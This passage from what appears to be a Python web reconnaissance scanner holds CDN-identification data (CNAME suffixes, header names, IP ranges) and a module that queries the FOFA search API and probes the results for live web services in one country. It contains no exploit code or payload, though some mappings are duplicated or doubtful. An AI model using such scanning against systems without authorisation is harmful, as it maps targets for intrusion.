70 | "fastcdn.cn": "Dnion",
71 | "fastly.net": "Fastly",
72 | "fastweb.com": "CnKuai",
73 | "fastwebcdn.com": "CnKuai",
74 | "footprint.net": "Level3",
75 | "fpbns.net": "Level3",
76 | "fwcdn.com": "CnKuai",
77 | "fwdns.net": "CnKuai",
78 | "globalcdn.cn": "Dnion",
79 | "hacdn.net": "CnKuai",
80 | "hadns.net": "CnKuai",
81 | "hichina.com": "WWW",
82 | "hichina.net": "WWW",
83 | "hwcdn.net": "Highwinds",
84 | "incapdns.net": "Incapsula",
85 | "internapcdn.net": "Internap",
86 | "jiashule.com": "Jiasule",
87 | "kunlun.com": "ALiyun",
88 | "kunlunar.com": "ALiyun",
89 | "kunlunca.com": "ALiyun",
90 | "kxcdn.com": "KeyCDN",
91 | "lswcdn.net": "Leaseweb",
92 | "lxcdn.com": "ChinaCache",
93 | "mwcloudcdn.com": "QUANTIL",
94 | "netdna-cdn.com": "MaxCDN",
95 | "okcdn.com": "21Vianet",
96 | "okglb.com": "21Vianet",
97 | "ourwebcdn.net": "ChinaCache",
98 | "ourwebpic.com": "ChinaCache",
99 | "presscdn.com": "Presscdn",
100 | "qingcdn.com": "",
101 | "qiniudns.com": "QiNiu",
102 | "skyparkcdn.net": "",
103 | "speedcdns.com": "QUANTIL",
104 | "sprycdn.com": "PowerLeader",
105 | "tlgslb.com": "Dnion",
106 | "txcdn.cn": "CDNetworks",
107 | "txnetworks.cn": "CDNetworks",
108 | "ucloud.cn": "UCloud",
109 | "unicache.com": "LineFuture",
110 | "verygslb.com": "VeryCloud",
111 | "vo.llnwd.net": "Limelight",
112 | "wscdns.com": "ChinaNetCenter",
113 | "wscloudcdn.com": "ChinaNetCenter",
114 | "xgslb.net": "Webluker",
115 | "ytcdn.net": "Akamai",
116 | "yunjiasu-cdn": "Baiduyun",
117 | "cloudfront": "CloudFront",
118 | "kunlun.com": "Alibaba Cloud",
119 | "ccgslb": "ChinaCache",
120 | "edgekey": "Akamai",
121 | "fastly": "Fastly",
122 | "chinacache": "ChinaCache",
123 | "edgekey": "Akamai",
124 | "akamai": "Akamai",
125 | "fastly": "Fastly",
126 | "edgecast": "EdgeCast",
127 | "azioncdn": "Azion",
128 | "cachefly": "CacheFly",
129 | "cdn77": "CDN77",
130 | "cdnetworks": "CDNetworks",
131 | "cdnify": "CDNify",
132 | "wscloudcdn": "ChinaNetCenter",
133 | "speedcdns": "ChinaNetCenter/Quantil",
134 | "mwcloudcdn": "ChinaNetCenter/Quantil",
135 | "cloudflare": "CloudFlare",
136 | "hwcdn": "HighWinds",
137 | "kxcdn": "KeyCDN",
138 | "awsdns": "KeyCDN",
139 | "fpbns": "Level3",
140 | "footprint": "Level3",
141 | "llnwd": "LimeLight",
142 | "netdna": "MaxCDN",
143 | "bitgravity": "Tata CDN",
144 | "azureedge": "Azure CDN",
145 | "anankecdn": "Anake CDN",
146 | "presscdn": "Press CDN",
147 | "telefonica": "Telefonica CDN",
148 | "dnsv1": "Tecent CDN",
149 | "cdntip": "Tecent CDN",
150 | "skyparkcdn": "Sky Park CDN",
151 | "ngenix": "Ngenix",
152 | "lswcdn": "LeaseWeb",
153 | "internapcdn": "Internap",
154 | "incapdns": "Incapsula",
155 | "cdnsun": "CDN SUN",
156 | "cdnvideo": "CDN Video",
157 | "clients.turbobytes.net": "TurboBytes",
158 | "clients.turbobytes.net": "TurboBytes",
159 | "turbobytes-cdn.com": "TurboBytes",
160 | "afxcdn.net": "afxcdn.net",
161 | "akamai.net": "Akamai",
162 | "akamaiedge.net": "Akamai",
163 | "akadns.net": "Akamai",
164 | "akamaitechnologies.com": "Akamai",
165 | "gslb.tbcache.com": "Alimama",
166 | "cloudfront.net": "Amazon Cloudfront",
167 | "anankecdn.com.br": "Ananke",
168 | "att-dsa.net": "AT&T",
169 | "azioncdn.net": "Azion",
170 | "belugacdn.com": "BelugaCDN",
171 | "bluehatnetwork.com": "Blue Hat Network",
172 | "systemcdn.net": "EdgeCast",
173 | "cachefly.net": "Cachefly",
174 | "cdn77.net": "CDN77",
175 | "cdn77.org": "CDN77",
176 | "panthercdn.com": "CDNetworks",
177 | "cdngc.net": "CDNetworks",
178 | "gccdn.net": "CDNetworks",
179 | "gccdn.cn": "CDNetworks",
180 | "cdnify.io": "CDNify",
181 | "ccgslb.com": "ChinaCache",
182 | "ccgslb.net": "ChinaCache",
183 | "c3cache.net": "ChinaCache",
184 | "chinacache.net": "ChinaCache",
185 | "cncssr.chinacache.net": "ChinaCache",
186 | "c3cdn.net": "ChinaCache",
187 | "lxdns.com": "ChinaNetCenter",
188 | "speedcdns.com": "QUANTIL/ChinaNetCenter",
189 | "mwcloudcdn.com": "QUANTIL/ChinaNetCenter",
190 | "cloudflare.com": "Cloudflare",
191 | "cloudflare.net": "Cloudflare",
192 | "edgecastcdn.net": "EdgeCast",
193 | "adn.": "EdgeCast",
194 | "wac.": "EdgeCast",
195 | "wpc.": "EdgeCast",
196 | "fastly.net": "Fastly",
197 | "fastlylb.net": "Fastly",
198 | "google.": "Google",
199 | "googlesyndication.": "Google",
200 | "youtube.": "Google",
201 | "googleusercontent.com": "Google",
202 | "l.doubleclick.net": "Google",
203 | "hiberniacdn.com": "Hibernia",
204 | "hwcdn.net": "Highwinds",
205 | "incapdns.net": "Incapsula",
206 | "inscname.net": "Instartlogic",
207 | "insnw.net": "Instartlogic",
208 | "internapcdn.net": "Internap",
209 | "kxcdn.com": "KeyCDN",
210 | "lswcdn.net": "LeaseWeb CDN",
211 | "footprint.net": "Level3",
212 | "llnwd.net": "Limelight",
213 | "lldns.net": "Limelight",
214 | "netdna-cdn.com": "MaxCDN",
215 | "netdna-ssl.com": "MaxCDN",
216 | "netdna.com": "MaxCDN",
217 | "stackpathdns.com": "StackPath",
218 | "mncdn.com": "Medianova",
219 | "instacontent.net": "Mirror Image",
220 | "mirror-image.net": "Mirror Image",
221 | "cap-mii.net": "Mirror Image",
222 | "rncdn1.com": "Reflected Networks",
223 | "simplecdn.net": "Simple CDN",
224 | "swiftcdn1.com": "SwiftCDN",
225 | "swiftserve.com": "SwiftServe",
226 | "gslb.taobao.com": "Taobao",
227 | "cdn.bitgravity.com": "Tata communications",
228 | "cdn.telefonica.com": "Telefonica",
229 | "vo.msecnd.net": "Windows Azure",
230 | "ay1.b.yahoo.com": "Yahoo",
231 | "yimg.": "Yahoo",
232 | "zenedge.net": "Zenedge",
233 | "cdnsun.net.": "CDNsun",
234 | "pilidns.com": "QiNiu",
235 | "sephen.com.cn": "peng"
236 | }
--------------------------------------------------------------------------------
/lib/data/cdn_header_keys.json:
--------------------------------------------------------------------------------
1 | [
2 | "xcs",
3 | "via",
4 | "x-via",
5 | "x-cdn",
6 | "x-cdn-forward",
7 | "x-ser",
8 | "x-cf1",
9 | "cache",
10 | "x-cache",
11 | "x-cached",
12 | "x-cacheable",
13 | "x-hit-cache",
14 | "x-cache-status",
15 | "x-cache-hits",
16 | "x-cache-lookup",
17 | "cc_cache",
18 | "webcache",
19 | "chinacache",
20 | "x-req-id",
21 | "x-requestid",
22 | "cf-request-id",
23 | "x-github-request-id",
24 | "x-sucuri-id",
25 | "x-amz-cf-id",
26 | "x-airee-node",
27 | "x-cdn-provider",
28 | "x-fastly",
29 | "x-iinfo",
30 | "x-llid",
31 | "sozu-id",
32 | "x-cf-tsc",
33 | "x-ws-request-id",
34 | "fss-cache",
35 | "powered-by-chinacache",
36 | "verycdn",
37 | "yunjiasu",
38 | "skyparkcdn",
39 | "x-beluga-cache-status",
40 | "x-content-type-options",
41 | "x-download-options",
42 | "x-proxy-node",
43 | "access-control-max-age",
44 | "age",
45 | "etag",
46 | "expires",
47 | "pragma",
48 | "cache-control",
49 | "last-modified"
50 | ]
51 |
--------------------------------------------------------------------------------
/lib/data/cdn_ip_cidr.json:
--------------------------------------------------------------------------------
1 | [
2 | "223.99.255.0/24",
3 | "71.152.0.0/17",
4 | "219.153.73.0/24",
5 | "125.39.46.0/24",
6 | "190.93.240.0/20",
7 | "14.0.113.0/24",
8 | "14.0.47.0/24",
9 | "113.20.148.0/22",
10 | "103.75.201.0/24",
11 | "1.32.239.0/24",
12 | "101.79.239.0/24",
13 | "52.46.0.0/18",
14 | "125.88.189.0/24",
15 | "150.138.248.0/24",
16 | "180.153.235.0/24",
17 | "205.251.252.0/23",
18 | "103.1.65.0/24",
19 | "115.127.227.0/24",
20 | "14.0.42.0/24",
21 | "109.199.58.0/24",
22 | "116.211.155.0/24",
23 | "112.253.3.0/24",
24 | "14.0.58.0/24",
25 | "223.112.227.0/24",
26 | "113.20.150.0/23",
27 | "61.182.141.0/24",
28 | "34.216.51.0/25",
29 | "124.95.188.0/24",
30 | "42.51.25.0/24",
31 | "183.136.133.0/24",
32 | "52.220.191.0/26",
33 | "119.84.93.0/24",
34 | "182.118.38.0/24",
35 | "13.59.250.0/26",
36 | "54.178.75.0/24",
37 | "119.84.92.0/24",
38 | "183.131.62.0/24",
39 | "111.32.136.0/24",
40 | "13.124.199.0/24",
41 | "111.47.227.0/24",
42 | "104.37.177.0/24",
43 | "14.0.50.0/24",
44 | "183.230.70.0/24",
45 | "114.111.59.0/24",
46 | "220.181.135.0/24",
47 | "112.140.32.0/19",
48 | "101.79.230.0/24",
49 | "14.0.115.0/24",
50 | "103.28.248.0/22",
51 | "117.34.72.0/24",
52 | "109.199.57.0/24",
53 | "101.79.149.0/24",
54 | "116.128.128.0/24",
55 | "115.231.186.0/24",
56 | "103.22.200.0/22",
57 | "61.155.165.0/24",
58 | "113.20.148.0/23",
59 | "185.254.242.0/24",
60 | "59.36.120.0/24",
61 | "70.132.0.0/18",
62 | "116.31.126.0/24",
63 | "119.147.134.0/24",
64 | "115.127.246.0/24",
65 | "52.47.139.0/24",
66 | "118.107.175.0/24",
67 | "52.78.247.128/26",
68 | "110.93.176.0/20",
69 | "54.240.128.0/18",
70 | "46.51.216.0/21",
71 | "119.31.251.0/24",
72 | "125.39.18.0/24",
73 | "108.175.33.0/24",
74 | "1.31.128.0/24",
75 | "61.151.163.0/24",
76 | "103.95.132.0/24",
77 | "58.215.118.0/24",
78 | "54.233.255.128/26",
79 | "120.52.113.0/24",
80 | "118.107.174.0/24",
81 | "1.32.242.0/24",
82 | "221.195.34.0/24",
83 | "101.79.228.0/24",
84 | "205.251.249.0/24",
85 | "113.200.91.0/24",
86 | "101.79.146.0/24",
87 | "221.238.22.0/24",
88 | "134.19.183.0/24",
89 | "110.93.160.0/20",
90 | "180.97.158.0/24",
91 | "115.127.251.0/24",
92 | "119.167.147.0/24",
93 | "115.127.238.0/24",
94 | "115.127.240.0/22",
95 | "14.0.48.0/24",
96 | "115.127.240.0/24",
97 | "113.7.183.0/24",
98 | "112.140.128.0/20",
99 | "115.127.255.0/24",
100 | "114.31.36.0/22",
101 | "101.79.232.0/24",
102 | "218.98.44.0/24",
103 | "106.119.182.0/24",
104 | "101.79.167.0/24",
105 | "125.39.5.0/24",
106 | "58.49.105.0/24",
107 | "124.202.164.0/24",
108 | "111.177.6.0/24",
109 | "61.133.127.0/24",
110 | "185.11.124.0/22",
111 | "150.138.150.0/24",
112 | "115.127.248.0/24",
113 | "103.74.80.0/22",
114 | "101.79.166.0/24",
115 | "101.71.55.0/24",
116 | "198.41.128.0/17",
117 | "117.21.219.0/24",
118 | "103.231.170.0/24",
119 | "221.204.202.0/24",
120 | "101.79.224.0/24",
121 | "112.25.16.0/24",
122 | "111.177.3.0/24",
123 | "204.246.168.0/22",
124 | "103.40.7.0/24",
125 | "134.226.0.0/16",
126 | "52.15.127.128/26",
127 | "122.190.2.0/24",
128 | "101.203.192.0/18",
129 | "1.32.238.0/24",
130 | "101.79.144.0/24",
131 | "176.34.28.0/24",
132 | "119.84.15.0/24",
133 | "18.216.170.128/25",
134 | "222.88.94.0/24",
135 | "101.79.150.0/24",
136 | "114.111.48.0/21",
137 | "124.95.168.0/24",
138 | "114.111.48.0/20",
139 | "110.93.176.0/21",
140 | "223.111.127.0/24",
141 | "117.23.61.0/24",
142 | "140.207.120.0/24",
143 | "157.255.26.0/24",
144 | "221.204.14.0/24",
145 | "183.222.96.0/24",
146 | "104.37.180.0/24",
147 | "42.236.93.0/24",
148 | "111.63.51.0/24",
149 | "114.31.32.0/20",
150 | "118.180.50.0/24",
151 | "222.240.184.0/24",
152 | "205.251.192.0/19",
153 | "101.79.225.0/24",
154 | "115.127.228.0/24",
155 | "113.20.148.0/24",
156 | "61.213.176.0/24",
157 | "112.65.75.0/24",
158 | "111.13.147.0/24",
159 | "113.20.145.0/24",
160 | "103.253.132.0/24",
161 | "52.222.128.0/17",
162 | "183.203.7.0/24",
163 | "27.221.27.0/24",
164 | "103.79.134.0/24",
165 | "123.150.187.0/24",
166 | "103.15.194.0/24",
167 | "162.158.0.0/15",
168 | "61.163.30.0/24",
169 | "182.140.227.0/24",
170 | "112.25.60.0/24",
171 | "117.148.161.0/24",
172 | "61.182.136.0/24",
173 | "114.31.56.0/22",
174 | "64.252.128.0/18",
175 | "183.61.185.0/24",
176 | "115.127.250.0/24",
177 | "150.138.138.0/24",
178 | "13.210.67.128/26",
179 | "211.162.64.0/24",
180 | "61.174.9.0/24",
181 | "14.0.112.0/24",
182 | "52.52.191.128/26",
183 | "27.221.124.0/24",
184 | "103.4.203.0/24",
185 | "103.14.10.0/24",
186 | "34.232.163.208/29",
187 | "114.31.48.0/20",
188 | "59.51.81.0/24",
189 | "183.60.235.0/24",
190 | "101.227.206.0/24",
191 | "125.39.174.0/24",
192 | "119.167.246.0/24",
193 | "118.107.160.0/21",
194 | "223.166.151.0/24",
195 | "110.93.160.0/19",
196 | "204.246.172.0/23",
197 | "119.31.253.0/24",
198 | "143.204.0.0/16",
199 | "14.0.60.0/24",
200 | "123.151.76.0/24",
201 | "116.193.80.0/24",
202 | "120.241.102.0/24",
203 | "180.96.20.0/24",
204 | "216.137.32.0/19",
205 | "223.94.95.0/24",
206 | "103.4.201.0/24",
207 | "14.0.56.0/24",
208 | "115.127.234.0/24",
209 | "113.20.144.0/23",
210 | "103.248.104.0/24",
211 | "122.143.15.0/24",
212 | "101.79.229.0/24",
213 | "101.79.163.0/24",
214 | "104.37.112.0/22",
215 | "115.127.253.0/24",
216 | "141.101.64.0/18",
217 | "113.20.144.0/22",
218 | "101.79.155.0/24",
219 | "117.148.160.0/24",
220 | "124.193.166.0/24",
221 | "109.94.168.0/24",
222 | "203.90.247.0/24",
223 | "101.79.208.0/21",
224 | "182.118.12.0/24",
225 | "114.31.58.0/23",
226 | "202.162.109.0/24",
227 | "101.79.164.0/24",
228 | "58.216.2.0/24",
229 | "222.216.190.0/24",
230 | "101.79.165.0/24",
231 | "111.6.191.0/24",
232 | "1.255.100.0/24",
233 | "52.84.0.0/15",
234 | "112.65.74.0/24",
235 | "183.250.179.0/24",
236 | "101.79.236.0/24",
237 | "119.31.252.0/24",
238 | "113.20.150.0/24",
239 | "60.12.166.0/24",
240 | "101.79.234.0/24",
241 | "113.17.174.0/24",
242 | "101.79.237.0/24",
243 | "61.54.46.0/24",
244 | "118.212.233.0/24",
245 | "183.110.242.0/24",
246 | "150.138.149.0/24",
247 | "117.34.13.0/24",
248 | "115.127.245.0/24",
249 | "14.0.102.0/24",
250 | "14.0.109.0/24",
251 | "61.130.28.0/24",
252 | "113.20.151.0/24",
253 | "219.159.84.0/24",
254 | "114.111.62.0/24",
255 | "172.64.0.0/13",
256 | "61.155.222.0/24",
257 | "120.52.29.0/24",
258 | "115.127.231.0/24",
259 | "14.0.49.0/24",
260 | "113.202.0.0/16",
261 | "103.248.104.0/22",
262 | "205.251.250.0/23",
263 | "103.216.136.0/22",
264 | "118.107.160.0/20",
265 | "109.87.0.0/21",
266 | "54.239.128.0/18",
267 | "115.127.224.0/19",
268 | "111.202.98.0/24",
269 | "109.94.169.0/24",
270 | "59.38.112.0/24",
271 | "204.246.176.0/20",
272 | "123.133.84.0/24",
273 | "103.4.200.0/24",
274 | "111.161.109.0/24",
275 | "112.84.34.0/24",
276 | "103.82.129.0/24",
277 | "183.3.254.0/24",
278 | "112.137.184.0/21",
279 | "122.227.237.0/24",
280 | "36.42.75.0/24",
281 | "13.35.0.0/16",
282 | "101.226.4.0/24",
283 | "116.140.35.0/24",
284 | "58.250.143.0/24",
285 | "13.54.63.128/26",
286 | "205.251.254.0/24",
287 | "173.245.48.0/20",
288 | "183.61.177.0/24",
289 | "113.20.144.0/24",
290 | "104.37.183.0/24",
291 | "35.158.136.0/24",
292 | "116.211.121.0/24",
293 | "42.236.94.0/24",
294 | "117.34.91.0/24",
295 | "123.6.13.0/24",
296 | "13.224.0.0/14",
297 | "113.20.146.0/24",
298 | "58.58.81.0/24",
299 | "52.124.128.0/17",
300 | "122.228.198.0/24",
301 | "197.234.240.0/22",
302 | "99.86.0.0/16",
303 | "144.220.0.0/16",
304 | "119.188.97.0/24",
305 | "36.27.212.0/24",
306 | "104.37.178.0/24",
307 | "114.31.52.0/22",
308 | "218.65.212.0/24",
309 | "1.255.41.0/24",
310 | "14.0.45.0/24",
311 | "1.32.243.0/24",
312 | "220.170.185.0/24",
313 | "122.190.3.0/24",
314 | "103.79.133.0/24",
315 | "220.181.55.0/24",
316 | "125.39.191.0/24",
317 | "115.127.226.0/24",
318 | "125.39.32.0/24",
319 | "61.120.154.0/24",
320 | "103.4.202.0/24",
321 | "103.79.134.0/23",
322 | "115.127.224.0/24",
323 | "113.20.147.0/24",
324 | "61.156.149.0/24",
325 | "210.209.122.0/24",
326 | "115.127.249.0/24",
327 | "104.37.179.0/24",
328 | "120.52.18.0/24",
329 | "54.192.0.0/16",
330 | "14.0.55.0/24",
331 | "61.160.224.0/24",
332 | "113.207.101.0/24",
333 | "101.79.157.0/24",
334 | "110.93.128.0/20",
335 | "58.251.121.0/24",
336 | "61.240.149.0/24",
337 | "130.176.0.0/16",
338 | "113.107.238.0/24",
339 | "112.65.73.0/24",
340 | "103.75.200.0/23",
341 | "199.83.128.0/21",
342 | "123.129.220.0/24",
343 | "54.230.0.0/16",
344 | "114.111.60.0/24",
345 | "199.27.128.0/21",
346 | "14.0.118.0/24",
347 | "101.79.158.0/24",
348 | "119.31.248.0/21",
349 | "54.182.0.0/16",
350 | "113.31.27.0/24",
351 | "14.17.69.0/24",
352 | "101.79.145.0/24",
353 | "113.20.144.0/21",
354 | "180.163.22.0/24",
355 | "104.37.176.0/21",
356 | "117.25.156.0/24",
357 | "115.127.252.0/24",
358 | "115.127.244.0/23",
359 | "14.0.46.0/24",
360 | "113.207.102.0/24",
361 | "52.199.127.192/26",
362 | "13.113.203.0/24",
363 | "64.252.64.0/18",
364 | "1.32.240.0/24",
365 | "123.129.232.0/24",
366 | "1.32.241.0/24",
367 | "180.163.189.0/24",
368 | "157.255.25.0/24",
369 | "1.32.244.0/24",
370 | "103.248.106.0/24",
371 | "121.48.95.0/24",
372 | "54.239.192.0/19",
373 | "113.20.146.0/23",
374 | "61.136.173.0/24",
375 | "35.162.63.192/26",
376 | "117.34.14.0/24",
377 | "183.232.29.0/24",
378 | "42.81.93.0/24",
379 | "122.228.238.0/24",
380 | "183.61.190.0/24",
381 | "125.39.239.0/24",
382 | "115.127.230.0/24",
383 | "103.140.200.0/23",
384 | "202.102.85.0/24",
385 | "14.0.32.0/21",
386 | "14.0.57.0/24",
387 | "112.25.90.0/24",
388 | "58.211.137.0/24",
389 | "210.22.63.0/24",
390 | "34.226.14.0/24",
391 | "13.32.0.0/15",
392 | "101.79.156.0/24",
393 | "103.89.176.0/24",
394 | "14.0.116.0/24",
395 | "106.42.25.0/24",
396 | "101.79.233.0/24",
397 | "101.79.231.0/24",
398 | "103.75.200.0/24",
399 | "119.188.9.0/24",
400 | "183.232.51.0/24",
401 | "149.126.72.0/21",
402 | "103.21.244.0/22",
403 | "115.127.233.0/24",
404 | "27.221.20.0/24",
405 | "198.143.32.0/19",
406 | "103.248.107.0/24",
407 | "101.79.227.0/24",
408 | "115.127.242.0/24",
409 | "119.31.250.0/24",
410 | "103.82.130.0/24",
411 | "99.84.0.0/16",
412 | "222.73.144.0/24",
413 | "103.79.132.0/22",
414 | "101.79.208.0/20",
415 | "104.37.182.0/24",
416 | "101.79.152.0/24",
417 | "36.99.18.0/24",
418 | "101.71.56.0/24",
419 | "36.250.5.0/24",
420 | "61.158.240.0/24",
421 | "119.188.14.0/24",
422 | "13.249.0.0/16",
423 | "183.214.156.0/24",
424 | "60.221.236.0/24",
425 | "58.30.212.0/24",
426 | "115.127.254.0/24",
427 | "188.114.96.0/20",
428 | "115.127.241.0/24",
429 | "103.4.200.0/22",
430 | "115.127.239.0/24",
431 | "115.127.243.0/24",
432 | "111.32.135.0/24",
433 | "120.221.29.0/24",
434 | "115.127.232.0/24",
435 | "14.0.43.0/24",
436 | "14.0.59.0/24",
437 | "183.61.236.0/24",
438 | "34.223.12.224/27",
439 | "103.24.120.0/24",
440 | "52.57.254.0/24",
441 | "113.207.100.0/24",
442 | "222.186.19.0/24",
443 | "113.20.149.0/24",
444 | "150.138.151.0/24",
445 | "115.231.110.0/24",
446 | "52.56.127.0/25",
447 | "104.37.176.0/24",
448 | "163.177.8.0/24",
449 | "163.53.89.0/24",
450 | "52.82.128.0/19",
451 | "114.111.63.0/24",
452 | "108.162.192.0/18",
453 | "14.136.130.0/24",
454 | "115.127.229.0/24",
455 | "14.17.71.0/24",
456 | "52.212.248.0/26",
457 | "180.163.188.0/24",
458 | "61.182.137.0/24",
459 | "119.161.224.0/21",
460 | "14.0.41.0/24",
461 | "202.162.108.0/24",
462 | "106.122.248.0/24",
463 | "52.66.194.128/26",
464 | "115.127.237.0/24",
465 | "220.170.186.0/24",
466 | "14.0.32.0/19",
467 | "14.0.114.0/24",
468 | "112.90.216.0/24",
469 | "115.127.236.0/24",
470 | "116.193.84.0/24",
471 | "113.207.76.0/24",
472 | "101.79.235.0/24",
473 | "101.79.224.0/20",
474 | "61.155.149.0/24",
475 | "101.79.148.0/24",
476 | "180.163.224.0/24",
477 | "204.246.174.0/23",
478 | "183.60.136.0/24",
479 | "101.227.207.0/24",
480 | "103.248.105.0/24",
481 | "119.188.35.0/24",
482 | "42.236.7.0/24",
483 | "116.193.88.0/21",
484 | "116.193.83.0/24",
485 | "120.199.69.0/24",
486 | "122.226.182.0/24",
487 | "58.20.204.0/24",
488 | "110.93.128.0/21",
489 | "115.231.187.0/24",
490 | "69.28.58.0/24",
491 | "114.31.32.0/19",
492 | "112.25.91.0/24",
493 | "59.52.28.0/24",
494 | "117.27.149.0/24",
495 | "61.147.92.0/24",
496 | "14.0.117.0/24",
497 | "14.0.40.0/24",
498 | "119.97.151.0/24",
499 | "103.199.228.0/22",
500 | "122.70.134.0/24",
501 | "115.127.244.0/24",
502 | "223.112.198.0/24",
503 | "115.127.225.0/24",
504 | "104.16.0.0/12",
505 | "121.12.98.0/24",
506 | "103.31.4.0/22",
507 | "204.246.164.0/22",
508 | "223.94.66.0/24",
509 | "35.167.191.128/26",
510 | "116.31.127.0/24",
511 | "101.79.226.0/24",
512 | "34.195.252.0/24",
513 | "115.127.247.0/24",
514 | "61.240.144.0/24",
515 | "108.175.32.0/20",
516 | "120.197.85.0/24",
517 | "183.232.53.0/24",
518 | "111.161.66.0/24",
519 | "117.34.28.0/24",
520 | "45.64.64.0/22",
521 | "14.0.44.0/24",
522 | "109.86.0.0/15",
523 | "182.23.211.0/24",
524 | "58.211.2.0/24",
525 | "119.36.164.0/24",
526 | "116.55.250.0/24",
527 | "101.227.163.0/24",
528 | "13.228.69.0/24",
529 | "120.221.136.0/24",
530 | "119.188.132.0/24",
531 | "115.127.235.0/24",
532 | "42.236.6.0/24",
533 | "125.88.190.0/24",
534 | "61.54.47.0/24",
535 | "103.27.12.0/22",
536 | "116.193.80.0/21",
537 | "101.79.159.0/24",
538 | "123.155.158.0/24",
539 | "111.47.226.0/24",
540 | "131.0.72.0/22",
541 | "192.230.64.0/18"
542 | ]
--------------------------------------------------------------------------------
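The CIDR list above is consumed by `lib/modules/iscdn.py` further down in this dump; the membership test it performs boils down to `ipaddress` network checks. A minimal, self-contained sketch (the trimmed list and the sample IPs are illustrative only):

```python
import ipaddress

# Illustrative subset of lib/data/cdn_ip_cidr.json
cdn_ip_cidr = ["104.16.0.0/12", "173.245.48.0/20", "198.41.128.0/17"]

def in_cdn_cidr(ip: str) -> bool:
    # True if the IP falls inside any known CDN network block
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in cdn_ip_cidr)

print(in_cdn_cidr("104.16.1.1"))  # True  -- inside 104.16.0.0/12
print(in_cdn_cidr("192.0.2.10"))  # False -- documentation range, not in the list
```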
/lib/modules/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/modules/fofa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import json
6 | import base64
7 | import random
8 | import requests
9 | # Disable insecure-request warnings for unverified HTTPS requests
10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
12 | from concurrent.futures import ThreadPoolExecutor, as_completed
13 | from lib.common.connectionPool import conn_pool
14 | from config.setting import fofaApi, fofaSize, fofaCountry
15 | from config.setting import USER_AGENTS
16 | from config.setting import threadNum, default_headers
17 |
18 | # Progress bar setup
19 | from rich.progress import (
20 | BarColumn,
21 | TimeRemainingColumn,
22 | Progress,
23 | )
24 |
25 | progress = Progress(
26 | "[progress.description]{task.description}",
27 | BarColumn(),
28 | "[progress.percentage]{task.percentage:>3.0f}%",
29 | TimeRemainingColumn(),
30 | "[bold red]{task.completed}/{task.total}",
31 | transient=True
32 | )
33 |
34 |
35 | class Fofa:
36 | def __init__(self, ip):
37 | super(Fofa, self).__init__()
38 | self.email = fofaApi['email']
39 | self.key = fofaApi['key']
40 | self.headers = {
41 | "Cache-Control": "max-age=0",
42 | "User-Agent": random.choice(USER_AGENTS),
43 | "Upgrade-Insecure-Requests": "1",
44 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
45 | }
46 | self.ip = ip
47 | self.urls = [] # web services returned by the fofa query
48 | self.life_urls = [] # web services verified to be alive
49 |
50 | def run(self):
51 | keywordsBs = base64.b64encode(self.ip.encode('utf-8'))
52 | keywordsBs = keywordsBs.decode('utf-8')
53 |
54 | url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country&size={3}".format(
55 | self.email, self.key, keywordsBs, fofaSize)
56 | try:
57 | session = conn_pool()
58 | target = session.get(url, timeout=10)
59 | # logger.log('INFOR', f'Checking IP: {self.ip}')
60 | # logger.log('INFOR', 'Fetching information via the API...')
61 | datas = json.loads(target.text)
62 | self.ip_info(datas['results'])
63 | session.close()
64 |
65 | self.is_life()
66 | return self.life_urls
67 |
68 | except requests.exceptions.ReadTimeout:
69 | pass
70 | # logger.log('ERROR', 'Request timed out')
71 | except requests.exceptions.ConnectionError as e:
72 | pass
73 | # logger.log('ERROR', f'Connection error: {e}')
74 | except json.decoder.JSONDecodeError:
75 | pass
76 | # logger.log('ERROR', 'Fetch failed, please retry')
77 | finally:
78 | return self.life_urls
79 |
80 | def ip_info(self, datas):
81 | for data in datas:
82 | # ip,title,port,domain,protocol,host,country
83 | # ['127.0.0.1', 'Metasploit - Setup and Configuration', '3790', '', '', 'https://127.0.0.1:3790', 'CN']
84 | # Keep only results from the configured country (default: CN)
85 | if data[6] == fofaCountry:
86 | if data[4] == "http" or data[4] == "https":
87 | url = "{0}://{1}".format(data[4], data[5])
88 | if url not in self.urls:
89 | self.urls.append(url)
90 |
91 | # Filter for live web services
92 | def is_life(self):
93 | if len(self.urls) == 0:
94 | return
95 | session = conn_pool()
96 | for url in self.urls:
97 | try:
98 | status_code = session.get(url, headers=default_headers, timeout=5).status_code
99 | if status_code < 500:
100 | self.life_urls.append(url)
101 | except requests.exceptions.ConnectionError:
102 | pass
103 | session.close()
104 |
105 |
106 | def run(ip, task):
107 | fofa = Fofa(ip)
108 | result = fofa.run()
109 | progress.update(task, advance=1)
110 | return result
111 |
112 |
113 | def fmain(ips):
114 | # result ['http://127.0.0.1:3790', 'http://127.0.0.1:80', 'https://127.0.0.1:443']
115 | result = []
116 |
117 | try:
118 | # Progress bar
119 | with progress:
120 | task = progress.add_task("[cyan]FOFA search, filtering live web services", total=len(ips), start=False)
121 |
122 | executor = ThreadPoolExecutor(max_workers=threadNum)
123 |
124 | all_task = [executor.submit(run, ip, task) for ip in ips]
125 |
126 | for future in as_completed(all_task):
127 | data = future.result()
128 | result.extend(data)
129 | except KeyboardInterrupt:
130 | pass
131 | finally:
132 | return result
133 |
134 |
--------------------------------------------------------------------------------
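A hedged usage sketch for the module above: `fmain()` takes an iterable of FOFA query terms (SScan feeds it IPs) and returns the web services that responded. The target IPs below are placeholders, and a valid `fofaApi` email/key must already be configured in `config/setting.py` for the query to return anything.

```python
# Hypothetical driver for lib/modules/fofa.py (not part of SScan itself)
from lib.modules.fofa import fmain

if __name__ == "__main__":
    targets = ["127.0.0.1", "192.0.2.1"]   # placeholder IPs
    live_urls = fmain(targets)             # e.g. ['http://127.0.0.1:80', ...]
    for url in live_urls:
        print(url)
```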
/lib/modules/iscdn.py:
--------------------------------------------------------------------------------
1 | '''
2 | CDN detection
3 | Adapted from OneForAll:
4 | https://github.com/shmilylty/OneForAll/blob/master/modules/iscdn.py
5 | '''
6 |
7 | import socket
8 | from config import setting
